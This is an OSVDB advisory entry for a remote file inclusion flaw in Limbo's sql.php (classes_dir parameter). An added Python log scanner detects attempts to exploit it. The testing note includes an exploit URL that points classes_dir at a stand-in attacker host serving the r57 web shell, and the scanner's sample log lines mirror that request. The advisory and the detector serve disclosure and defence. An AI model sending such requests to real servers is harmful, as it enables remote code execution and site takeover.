Limbo sql.php classes_dir Variable Remote File Inclusion

2006-09-13T14:48:55
ID OSVDB:28976
Type osvdb
Reporter HACKERS PAL(security@soqor.net)
Modified 2006-09-13T14:48:55

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

/classes/adodbt/sql.php?classes_dir=http://[attacker]/tools/r57.txt?
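Defensive example added here (not part of the OSVDB entry or of Limbo's code): a Python check that scans web server access logs for requests matching the pattern in the testing note above. The Apache combined log format, the sample log lines, and the function name are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and parameter name come from the advisory's testing note.
TARGET_PATH = "/classes/adodbt/sql.php"
PARAM = "classes_dir"
# A value that starts with a URL scheme (or data:) is not a local directory.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)
# Assumed log layout: client ... "METHOD target HTTP/x.y" status ...
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def find_inclusion_attempts(lines):
    """Return (client, status, decoded_value) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        # Limbo may live in a subdirectory, so compare the path suffix only.
        path = re.sub(r"/+", "/", unquote(parts.path)).lower()
        if not path.endswith(TARGET_PATH):
            continue
        # parse_qsl percent-decodes keys and values, so encoded forms match too.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == PARAM and REMOTE.match(value):
                hits.append((client, int(status), value))
    return hits

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.23 - - [13/Sep/2006:14:50:01 +0000] "GET /limbo/classes/adodbt/'
    'sql.php?classes_dir=http://203.0.113.7/x.txt? HTTP/1.1" 200 512',
    '198.51.100.23 - - [13/Sep/2006:14:50:09 +0000] "GET /limbo/classes/adodbt/'
    'sql.php?classes_dir=http%3A%2F%2F203.0.113.7%2Fx.txt%3F HTTP/1.0" 404 210',
    '192.0.2.10 - - [13/Sep/2006:14:51:30 +0000] "GET /limbo/index.php'
    '?option=content HTTP/1.1" 200 8120',
    '192.0.2.11 - - [13/Sep/2006:14:52:02 +0000] "GET /limbo/classes/adodbt/'
    'sql.php?classes_dir=classes/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, status, value in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{client} status={status} {PARAM}={value}")
```

Access logs record only the query string, so a value supplied in a POST body or cookie would not appear here.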

References:

Vendor URL: http://www.limboforge.org/
Secunia Advisory ID: 21944
Related OSVDB IDs: 28982, 28983, 28984, 28987, 28978, 28979, 28981, 28977, 28980, 28986, 28985
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0264.html